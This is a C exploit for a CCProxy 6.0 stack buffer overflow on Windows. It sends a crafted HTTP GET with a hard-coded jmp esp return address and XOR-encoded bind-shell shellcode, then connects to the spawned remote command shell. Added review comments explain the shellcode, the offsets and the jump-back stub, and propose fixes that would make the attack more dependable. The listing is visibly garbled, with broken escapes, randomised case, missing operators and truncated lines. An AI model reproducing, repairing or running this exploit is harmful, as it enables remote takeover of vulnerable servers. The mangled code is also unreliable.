/*
 * ccpx.c - x86/Win32 CCProxy 6.0 remote stack buffer overflow exploit
 * Author: ISNO
 * COMPILE: cl ccpx.c
 * Usage: ccpx target [port] [offset]   (see the argument handling in main)
 * Default target port is 808
 * Improved by goldsun 5261314@sohu.com
 */
#include
#include
#include
#include
#pragma comment (Lib, "WS2_32")
#define pport 808
#define xport 53
// Lion's shellcode: Win32 bind shell, listens on TCP port 53 (XPORT, which
// main() connects to after the overflow is sent). Rows 1-2 are the decoder:
// a jmp/call/pop to find the payload address, then `xor byte [edx+ecx],0x99`
// over 0x17d bytes. Everything after "// shellcode" is XOR-0x99 encoded;
// decoding the tail yields the imports it resolves at run time (GetProcAddress,
// CreateProcessA, ExitThread, LoadLibraryA, ws2_32, WSASocketA, bind, listen,
// accept, closesocket). The encoding keeps 0x00 out of the string, which is
// why main() can measure it with strlen().
// NOTE(review): this listing is lossy. Every escape appears as "/ X.." with
// spaces instead of "\x..", letter case is randomised, one escape is a lone
// digit ("/ X1"), rows vary in length and one row holds two string literals.
// The exact byte sequence cannot be recovered from this page -- treat it as
// illustrative only, not as something to paste into a build.
Unsigned char shellcode [] =
"/ XEB / X10 / X5A / X4A / X33 / XC9 / X66 / XB9 / X7D / X01 / X80 / X34 / X0A / X99 / XE2 / XFA"
"/ Xeb / X05 / XE8 / XEB / XFF / XFF / XFF"
// shellcode (XOR-0x99 encoded from here on)
"/ x70 / x99 / xc3 / xfd / x38 / xa9 / x99 / x99 / x99 / x12 / xd9 / x95 / x12"
"/ XE9 / X85 / X91 / X12 / XD9 / X12 / XEA / XA5 / X12 / XED / X87 / XE1 / X9A"
"/ X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6"
"/ X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED / X91 / XC0 / XC6 / X1A / X5E / X9D"
"/ xdc / x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf / xbd / x9a / x5a / x48 / x78 / x9a"
"/ X58 / XAA / X50 / XDF / X1 / X9A / X5A / X58 / X78 / X9B / X9A / X58"
"/ X12 / X99 / X9A / X5A / X12 / X63 / X12 / X6E / X1A / X5F / X97 / X12 / X49 / XF3 / X9A / XC0"
"/ x71 / x1e / x99 / x99 / x99 / x1a / x5f / x94 / xcb / xcf / x66 / xce / x65 / xc3 / x12 / x41"
"/ Xf3 / X9C / XC0 / X71 / XED / X99 / X99 / X99 / XC9 / XC9 / XC9 / XC9 / XF3 / X98 / XF3 / X9B"
"/ X66 / XCE / X75 / X12 / X41 / X99 / X9E / XAC / XAA / X59 / X10 / XDE / X9D"
"/ XF3 / X89 / XCE / XCA / X66 / XCE / X69 / XF3 / X98 / XCA / X66 / XCE / X6D / XC9 / XC9 / XCA"
"/ x66 / xcE / x61 / x12 / x49 / x1a / x75 / xdd / x12 / x6d / xaa / x59 / xf3 / x89 / xc0 / x10"
"/ x9d / x17 / x7b / x62 / x10 / xcf / xa1 / x10 / xcf / xa5 / x10 / xcf / xd9 / xff / x5e / xdf"
"/ xb5 / x98 / x98 / x14 / xde / x89 / xc9 / xcf / xaa / x50 / xc8 / xc8 / xc8 / xf3 / x98 / xc8"
"/ XC8 / X5E / XDE / XA5 / XFA / XF4 / XDE / XA5 / XC9 / XC8 / X66 / XCE / X79" "/ XCB / X66 / XCE / X65 / XCA / X66 / XCE / X65 / XC9 / X66 / XCE / X7D / XAA / X59 "
"/ x35" // port (author's marker; the row is too short to trust in this listing)
"/ X1C / X59 / Xec / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59"
"/ x5a / x71 / x76 / x67 / x66 / x66 / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / xfd / xfd"
"/ XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC / XF8 / XED / XFC / XC9 / XEB / XF6 / XFA / XFC"
"/ XEA / XEA / XD8 / X99 / XDC / XE1 / XF0 / XED / XCD / XF1 / XEB / XFC / XF8 / XFD / X99 / XD5"
"/ XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB / XF8 / XEB / XE0 / XD8 / X99 / XEE / XEA / XAB / XC6"
"/ XAA / XAb / X99 / XCE / XCA / XD8 / XCA / XF6 / XFA / XF2 / XFC / XED / XD8 / X99 / XFB / XF0"
"/ XF7 / XFD / X99 / XF5 / XF0 / XEA / XED / XFC / XF7 / X99 / XF8 / XFA / XFA / XFC / XE9 / XED"
"/ x99 / xfa / xf5 / xf6 / xea / xfc / xea / xf6 / xfa / xf2 / xfc / xed / x99";
// Prototypes for the helpers defined after main().
// NOTE(review): the shell() prototype is garbled in this listing; its
// definition takes a single socket argument (used as `sock` in the body).
INT Make_Connection (Char * Address, Int port, int Timeout);
Void shell (int SHELL (INT SOCK);
// Entry point. argv[1] = target host, argv[2] = target port (default PPORT,
// 808), argv[3] = stack offset adjustment. Builds an over-long HTTP request
// URI, sends it to the proxy port, then connects to the bind shell on XPORT.
// NOTE(review): the listing is lossy -- "+" characters appear to have been
// stripped ("[ ]" where "[+]" is expected, "4045 offset", "buf strlen (buf)",
// "% D 16 ="), letter case is randomised and several lines are truncated.
// Read the structure, not the exact tokens.
Int main (int Argc, char * argv [])
{
Socket CSOCK, S2;
Wsadata wsadata;
// NOTE(review): offset is assigned only on some paths below (argc >= 4, the
// "no real Internet IP" prompt, or a localhost target). On every other path
// it is read uninitialised by the memset() that sizes the padding -- undefined
// behaviour. Initialise it (`offset = 0;`); the intended default is not
// visible here, the commented-out formula below hints at 15 - strlen(localip).
Int Yn, Offset, RET, PPORT
Char line [80];
Char BUF [8000], SBUF [10000];
CHAR LOCAL [100] = {0};
Char * localip;
Struct Hostent * Phost;
IF (Argc <2)
{
Printf ("CCProxy 6 Exploccus.org & Compiled By Goldsun / N");
// NOTE(review): the usage line is truncated in this listing.
Printf ("USAGE:% s
Return 1;
}
// Optional target port. atoi() reports no errors; strtol() would.
IF (argc> = 3)
Pport = ATOI (Argv [2]);
Else
Pport = pport;
// Optional explicit offset; it is not range-checked -- see the memset() below.
IF (argc> = 4) OFFSET = ATOI (Argv [3]);
IF (WsaStartup (MakeWord (1, 1), & WSADATA)! = 0)
{
Printf ("[-] WSAStartup Failed./N");
WSACLEANUP ();
Exit (1);
}
// Get this host's name (the cast and a parenthesis are garbled in the listing).
Gethostname (CHAR *) LOCAL, SIZEOF (Local) -1);
// Resolve it to the local IP address, which is only printed.
// NOTE(review): gethostbyname() returns NULL on failure and that is never
// checked before phost->h_addr_list[0] is dereferenced -- a crash, not a
// clean error. Test phost (and h_addr_list[0]) before calling inet_ntoa().
Phost = gethostByname ((char *) local);
Localip = inet_ntoa (* (in_addr *) phost-> h_addr_list [0]);
// offset = 15-strlen (localip); // offset from target_ip len retdroffset = 2;
Printf ("Local IP:% s Target IP:% S:% D / N", localip, argv [1], pport);
// The padding length appears to depend on how long the client address string
// seen by the proxy is, so the user is asked which address the target observes.
PRINTF ("Target in The Same Subnet? [Y / N]");
Yn = _Getch ();
IF (Yn == 0x6e || yn == 0x4e) // 'n' or 'N'
{
PRINTF ("/ R / NHAVE REAL INTERNET IP Address? [Y / N]");
Yn = _Getch ();
IF (Yn == 0x6e || yn == 0x4e)
{
Printf ("/ R / NYOUR GATEWAY Internet IP Address:");
// NOTE(review): gets() has no bound and `line` is 80 bytes -- a stack
// overflow in the exploit's own input handling. Use
// `fgets(line, sizeof line, stdin)` and strip the trailing newline
// (the strlen() below would otherwise count it and shift the offset by one).
Gets (line);
// 15 is presumably the longest dotted-quad. The result is not bounded: input
// longer than 15 characters makes offset negative.
OFFSET = 15-Strlen (Line);
}
}
// If the attack target is the local address, the client address the proxy
// sees is fixed, so the offset is fixed too.
IF (strcmp (argv [1], "localhost") == 0 || StrCMP (Argv [1], "127.0.0.1") == 0)
//offset=15-strlen ("127.0.0.1 ");
OFFSET = 6;
Printf ("/ R / N [ ] Connecting TO% S:% D / N", Argv [1], PPORT);
// 10-second connect timeout; make_connection() returns a negative code on failure.
Csock = make_connection (Argv [1], PPort, 10);
IF (CSOCK <0)
{
Printf ("[-] connection err./n");
Exit (1);
}
Printf ("Offset:% D", OFFSET;
// Build the overflow string: a run of 0x41 ('A', which also executes as
// `inc ecx`, so it doubles as a slide), then the shellcode, then the return
// address and a jump-back stub.
MEMSET (BUF, 0, SIZEOF (BUF) -1);
// NOTE(review): the length is 4045+offset (the "+" is lost in the listing) and
// nothing checks it against sizeof buf. offset comes straight from argv[3] or
// the prompt above: a large value overruns BUF, a value below -4045 wraps to a
// huge size_t. Bound it before this call, e.g.
//   if (offset < -4045 || 4045 + offset + 16 + 1 > (int)sizeof buf) exit(1);
// (16 = return address + jump stub appended below, +1 for the terminator).
MEMSET (BUF, 0x41, 4045 offset);
// Overwrite the tail of the 'A' run with the shellcode so it ends right where
// the saved return address is overwritten. strlen(shellcode) presumes the
// encoded payload contains no 0x00 byte.
Memcpy (buf strlen (buf) -strlen (shellcode), shellcode, strlen (shellcode);
Printf ("Magic Length:% D 16 =", Strlen (BUF));
// Saved EIP -> 0x7FFA54CD (little-endian), a `jmp esp` in one specific Windows
// build. NOTE(review): hard-coded; on any other build this most likely crashes
// the service instead of reaching the shellcode.
STRCAT (BUF, "/ XCD / X54 / XFA / X7F"); // Ret AddR JMP ESP
// Executed at ESP after the `jmp esp`: `mov ecx,0x25414141; shr ecx,0x14;
// sub esp,ecx; jmp esp` -- subtracts 0x254 (596) from ESP without a 0x00 byte
// in the immediate and jumps back into the 'A' slide ahead of the shellcode.
STRCAT (BUF, "/ XB9 / X41 / X41 / X41 / X25 / XC1 / XE9 / X14 / X2B / XE1 / XFF / XE4"); // JMP Back
// The overflow travels as the request-URI of an HTTP/1.0 GET to the proxy port.
// SBUF (10000) has room for BUF (8000) plus the request framing.
Sprintf (SBUF, "Get /% S HTTP / 1.0 / R / N / R / N", BUF);
Printf ("Buffer Length:% D / N", Strlen (BUF));
Printf ("[ ] Send Magic Buffer ... / N");
RET = Send (CSOCK, SBUF, Strlen (SBUF), 0);
IF (RET <= 0)
{
Printf ("[-] Send Err./N");
Exit (1);
}
CloseSocket (CSOCK);
// Give the shellcode a second to decode, bind and listen before connecting.
Sleep (1000);
Printf ("[ ] Connecting to cmd shell port ... / n");
S2 = make_connection (Argv [1], Xport, 10);
IF (S2 <0)
{
// NOTE(review): truncated in the listing; by analogy with the connect failure
// above this is presumably an error message followed by exit(1).
Printf ("[-] Connect Err: -
}
Shell (S2);
WSACLEANUP ();
Return 0;
}
// Resolve a host name or dotted-quad to an IPv4 address in network byte order.
// Returns 0 when neither inet_addr() nor gethostbyname() can resolve the name.
// NOTE(review): inet_addr() signals failure with -1 (INADDR_NONE), which is also
// the valid address 255.255.255.255; such a literal falls through to the DNS
// lookup. Harmless for this tool, but inet_pton()/getaddrinfo() avoid it.
Unsigned int resolve (char * name)
{
Struct hostent * he;
UNSIGNED INT IP;
IF ((ip = inet_addr (name)) == (- 1))
{
IF ((He = gethostByname (Name)) == 0)
Return 0;
// AF_INET only: copy the first 4-byte address out of the host entry.
Memcpy (& IP, He-> H_ADDR, 4);
}
Return IP;
}
// Open a TCP connection to address:port, waiting at most `timeout` seconds.
// Returns the connected socket (> 0) or a negative code:
//   -1 socket() failed, -2 the name did not resolve, -3 select() failed,
//   -4 timed out, -5 the connect reported an error through SO_ERROR.
INT Make_Connection (Char * Address, Int port, int Timeout)
{
Struct SockAddr_in Target;
Socket S;
INT I;
DWORD BF;
FD_SET WD;
Struct TimeVal TV;
S = Socket (AF_INET, SOCK_STREAM, 0);
IF (s <0)
Return -1;
Target.sin_family = AF_INET;
Target.sin_addr.s_addr = resolve (address);
IF (target.sin_addr.s_addr == 0)
{
CloseSocket (s);
Return -2;
}
Target.sin_port = htons (port);
// Switch to non-blocking so connect() returns at once; completion is then
// observed with select() on writability plus SO_ERROR, which is why the
// return value of connect() is deliberately not examined.
BF = 1;
IOCTLSocket (S, Fionbio, & bf);
TV.TV_SEC = Timeout;
TV.TV_USEC = 0;
FD_ZERO (& WD);
FD_SET (S, & WD);
Connect (S, Struct SockAddr *) & Target, Sizeof (Target);
// "S 1" is s+1 with the "+" lost in the listing.
IF ((i = SELECT (S 1, 0, & WD, 0, & TV)) == (- 1))
{
CloseSocket (s);
Return -3;
}
IF (i == 0)
{
CloseSocket (s);
Return-4;
}
// Writable does not mean connected: fetch the pending socket error.
i = sizeof (int);
GetSockopt (S, SOL_Socket, SO_ERROR, (CHAR *) & bf, & i);
IF ((bf! = 0) || (i! = sizeof (int))))))
{
CloseSocket (s);
Return -5;
}
// bf is 0 at this point, so this puts the socket back into blocking mode for
// the caller's send()/recv().
IOCTLSocket (S, Fionbio, & bf);
Return S;
}
/* ripped from test and modified by EY4S for Win32 */
// Interactive relay between the local console and the remote shell socket:
// poll the socket for up to one second; if it is readable copy its output to
// stdout, otherwise block reading stdin and send what was typed. Returns when
// either side closes or errors.
// NOTE(review): the select() set is a hand-built two-word array (count, then
// the handle) that relies on the Winsock fd_set layout instead of the FD_SET
// macros used in make_connection(). Because the stdin read() blocks, remote
// output that arrives while waiting for keyboard input is shown only after the
// next line is typed.
Void shell (int SHELL)
{
Int L;
Char BUF [512];
Struct TimeVal Time;
Unsigned long ul [2];
TIME.TV_SEC = 1;
TIME.TV_USEC = 0;
While (1)
{
UL [0] = 1;
UL [1] = SOCK;
L = SELECT (0, (fd_set *) & UL, NULL, NULL, & TIME);
if (l == 1)
{
// Socket readable: relay remote output to stdout.
L = RECV (Sock, BUF, SIZEOF (BUF), 0);
IF (l <= 0)
{
Printf ("[-] connection closed./N");
Return;
}
L = Write (1, BUF, L);
IF (l <= 0)
{
Printf ("[-] connection closed./N");
Return;
}
}
Else
{
// Timeout: block on stdin and forward the input to the remote shell.
L = read (0, buf, sizeof (buf));
IF (l <= 0)
{
Printf ("[-] connection closed./N");
Return;
}
L = Send (SOCK, BUF, L, 0);
IF (l <= 0)
{
Printf ("[-] connection closed./N");
Return;
}
}
}
}